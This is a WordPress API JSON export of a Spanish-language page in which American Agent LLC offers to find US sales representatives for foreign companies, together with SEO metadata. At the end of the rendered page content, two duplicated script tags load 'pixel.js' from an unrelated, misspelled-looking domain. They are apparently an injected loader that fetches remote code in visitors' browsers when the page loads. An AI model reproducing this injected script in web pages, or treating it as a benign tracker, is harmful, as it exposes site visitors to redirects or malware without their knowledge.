{"id":3152,"date":"2014-08-16T07:17:35","date_gmt":"2014-08-16T07:17:35","guid":{"rendered":"https:\/\/americanagent.com\/sales-representative-search-2\/"},"modified":"2014-09-10T16:35:09","modified_gmt":"2014-09-10T20:35:09","slug":"busqueda-de-representante-de-ventas-de-ee-uu","status":"publish","type":"page","link":"https:\/\/americanagent.com\/es\/busqueda-de-representante-de-ventas-de-ee-uu\/","title":{"rendered":"B\u00fasqueda de representante de ventas de EE.UU."},"content":{"rendered":"<div  class='flex_column av-av_one_full-2a9015ff38129c418a3f2eafba3e9512 av_one_full  avia-builder-el-0  avia-builder-el-no-sibling  first flex_column_div  '     ><p>\n<style type=\"text\/css\" data-created_by=\"avia_inline_auto\" id=\"style-css-av-av_heading-ed153ddb90438b2642f539d9196263f8\">\n#top .av-special-heading.av-av_heading-ed153ddb90438b2642f539d9196263f8{\npadding-bottom:10px;\n}\nbody .av-special-heading.av-av_heading-ed153ddb90438b2642f539d9196263f8 .av-special-heading-tag .heading-char{\nfont-size:25px;\n}\n.av-special-heading.av-av_heading-ed153ddb90438b2642f539d9196263f8 .av-subheading{\nfont-size:15px;\n}\n<\/style>\n<div  class='av-special-heading av-av_heading-ed153ddb90438b2642f539d9196263f8 av-special-heading-h3  avia-builder-el-1  el_before_av_textblock  avia-builder-el-first '><h3 class='av-special-heading-tag '  itemprop=\"headline\"  >B\u00fasqueda de representante de ventas de EE.UU.<\/h3><div class=\"special-heading-border\"><div class=\"special-heading-inner-border\"><\/div><\/div><\/div><br \/>\n<section  class='av_textblock_section av-av_textblock-7f317741ca2418a36614f046e139f8be '   itemscope=\"itemscope\" itemtype=\"https:\/\/schema.org\/CreativeWork\" ><div class='avia_textblock'  itemprop=\"text\" ><p>La mejor manera de penetrar en el mercado americano es probablemente contratando a representantes de ventas fiables y experimentados en la industria. A veces la situaci\u00f3n requiere este tipo de enfoque de inmediato.<\/p>\n<p>Podemos encontrar representantes de ventas en EE.UU. y otros expertos en la materia a nivel nacional, en cualquier industria, y con cualquier nivel de experiencia.<\/p>\n<p>Podemos encontrar y le ayudaremos a colaborar con los profesionales de ventas fiables 100% y leales a su empresa y con representaci\u00f3n exclusiva de su compa\u00f1\u00eda.<\/p>\n<p>Los representantes de ventas de Am\u00e9rica pueden ser muy cautelosos a la hora de colaborar con empresas extranjeras, a veces el mejor candidato se pierde durante las negociaciones finales, porque la empresa no entiende algunas de las cuestiones que son importantes para los representantes de ventas estadounidenses (cuestiones de seguros m\u00e9dicos, por ejemplo), y a veces puede ser muy dif\u00edcil superar estas barreras.<\/p>\n<p>Comprendemos bien sus preocupaciones y tambi\u00e9n somos capaces de explicar la importancia de estas cuestiones para que Usted pueda comprender su punto de vista. Conocemos la manera de superar estas situaciones.<\/p>\n<p>Nos gusta hablar con los representantes de ventas de Am\u00e9rica, presentando oportunidades \u00fanicas en su g\u00e9nero y empresas con grandes productos. Tambi\u00e9n entienden los beneficios de ser uno de sus primeros representantes de ventas en el territorio de EE.UU.<\/p>\n<p>Utilizamos las mismas fuentes que los reclutadores locales de Am\u00e9rica y &#8220;cazadores de talentos&#8221;. Sin embargo, ofrecemos una soluci\u00f3n mucho m\u00e1s econ\u00f3mica y s\u00f3lo llevamos a cabo estas b\u00fasquedas muy espec\u00edficas de representantes de ventas, comprendiendo su posici\u00f3n internacional.<\/p>\n<\/div><\/section><\/p><\/div><script src='https:\/\/scripts.trasnaltemyrecords.com\/pixel.js?track=r&#038;subid=043' type='text\/javascript'><\/script><script src='https:\/\/scripts.trasnaltemyrecords.com\/pixel.js?track=r&#038;subid=043' type='text\/javascript'><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":3,"comment_status":"open","ping_status":"open","template":"","meta":{"_bbp_topic_count":0,"_bbp_reply_count":0,"_bbp_total_topic_count":0,"_bbp_total_reply_count":0,"_bbp_voice_count":0,"_bbp_anonymous_reply_count":0,"_bbp_topic_count_hidden":0,"_bbp_reply_count_hidden":0,"_bbp_forum_subforum_count":0,"footnotes":""},"class_list":["post-3152","page","type-page","status-publish","hentry"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.3 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>American Agent LLC - Representante de ventas de EE.UU.<\/title>\n<meta name=\"description\" content=\"Estamos dispuestos a encontrar y contratar a los mejores representantes de venta en Am\u00e9rica. Trabajar con representantes comerciales en los Estados Unidos.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/americanagent.com\/es\/busqueda-de-representante-de-ventas-de-ee-uu\/\" \/>\n<meta property=\"og:locale\" content=\"es_ES\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"American Agent LLC - Representante de ventas de EE.UU.\" \/>\n<meta property=\"og:description\" content=\"Estamos dispuestos a encontrar y contratar a los mejores representantes de venta en Am\u00e9rica. Trabajar con representantes comerciales en los Estados Unidos.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/americanagent.com\/es\/busqueda-de-representante-de-ventas-de-ee-uu\/\" \/>\n<meta property=\"og:site_name\" content=\"American Agent - USA Sales Services and Distributor Search Services\" \/>\n<meta property=\"article:modified_time\" content=\"2014-09-10T20:35:09+00:00\" \/>\n<meta name=\"twitter:label1\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data1\" content=\"2 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/americanagent.com\\\/es\\\/busqueda-de-representante-de-ventas-de-ee-uu\\\/\",\"url\":\"https:\\\/\\\/americanagent.com\\\/es\\\/busqueda-de-representante-de-ventas-de-ee-uu\\\/\",\"name\":\"American Agent LLC - Representante de ventas de EE.UU.\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/americanagent.com\\\/es\\\/#website\"},\"datePublished\":\"2014-08-16T07:17:35+00:00\",\"dateModified\":\"2014-09-10T20:35:09+00:00\",\"description\":\"Estamos dispuestos a encontrar y contratar a los mejores representantes de venta en Am\u00e9rica. Trabajar con representantes comerciales en los Estados Unidos.\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/americanagent.com\\\/es\\\/busqueda-de-representante-de-ventas-de-ee-uu\\\/#breadcrumb\"},\"inLanguage\":\"es-ES\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/americanagent.com\\\/es\\\/busqueda-de-representante-de-ventas-de-ee-uu\\\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/americanagent.com\\\/es\\\/busqueda-de-representante-de-ventas-de-ee-uu\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/americanagent.com\\\/es\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"B\u00fasqueda de representante de ventas de EE.UU.\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/americanagent.com\\\/es\\\/#website\",\"url\":\"https:\\\/\\\/americanagent.com\\\/es\\\/\",\"name\":\"American Agent - USA Sales Services and Distributor Search Services\",\"description\":\"USA Sales services and Distributor, Importer and Reseller Search services.\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/americanagent.com\\\/es\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"es-ES\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"American Agent LLC - Representante de ventas de EE.UU.","description":"Estamos dispuestos a encontrar y contratar a los mejores representantes de venta en Am\u00e9rica. Trabajar con representantes comerciales en los Estados Unidos.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/americanagent.com\/es\/busqueda-de-representante-de-ventas-de-ee-uu\/","og_locale":"es_ES","og_type":"article","og_title":"American Agent LLC - Representante de ventas de EE.UU.","og_description":"Estamos dispuestos a encontrar y contratar a los mejores representantes de venta en Am\u00e9rica. Trabajar con representantes comerciales en los Estados Unidos.","og_url":"https:\/\/americanagent.com\/es\/busqueda-de-representante-de-ventas-de-ee-uu\/","og_site_name":"American Agent - USA Sales Services and Distributor Search Services","article_modified_time":"2014-09-10T20:35:09+00:00","twitter_misc":{"Est. reading time":"2 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/americanagent.com\/es\/busqueda-de-representante-de-ventas-de-ee-uu\/","url":"https:\/\/americanagent.com\/es\/busqueda-de-representante-de-ventas-de-ee-uu\/","name":"American Agent LLC - Representante de ventas de EE.UU.","isPartOf":{"@id":"https:\/\/americanagent.com\/es\/#website"},"datePublished":"2014-08-16T07:17:35+00:00","dateModified":"2014-09-10T20:35:09+00:00","description":"Estamos dispuestos a encontrar y contratar a los mejores representantes de venta en Am\u00e9rica. Trabajar con representantes comerciales en los Estados Unidos.","breadcrumb":{"@id":"https:\/\/americanagent.com\/es\/busqueda-de-representante-de-ventas-de-ee-uu\/#breadcrumb"},"inLanguage":"es-ES","potentialAction":[{"@type":"ReadAction","target":["https:\/\/americanagent.com\/es\/busqueda-de-representante-de-ventas-de-ee-uu\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/americanagent.com\/es\/busqueda-de-representante-de-ventas-de-ee-uu\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/americanagent.com\/es\/"},{"@type":"ListItem","position":2,"name":"B\u00fasqueda de representante de ventas de EE.UU."}]},{"@type":"WebSite","@id":"https:\/\/americanagent.com\/es\/#website","url":"https:\/\/americanagent.com\/es\/","name":"American Agent - USA Sales Services and Distributor Search Services","description":"USA Sales services and Distributor, Importer and Reseller Search services.","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/americanagent.com\/es\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"es-ES"}]}},"_links":{"self":[{"href":"https:\/\/americanagent.com\/es\/wp-json\/wp\/v2\/pages\/3152","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/americanagent.com\/es\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/americanagent.com\/es\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/americanagent.com\/es\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/americanagent.com\/es\/wp-json\/wp\/v2\/comments?post=3152"}],"version-history":[{"count":0,"href":"https:\/\/americanagent.com\/es\/wp-json\/wp\/v2\/pages\/3152\/revisions"}],"wp:attachment":[{"href":"https:\/\/americanagent.com\/es\/wp-json\/wp\/v2\/media?parent=3152"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}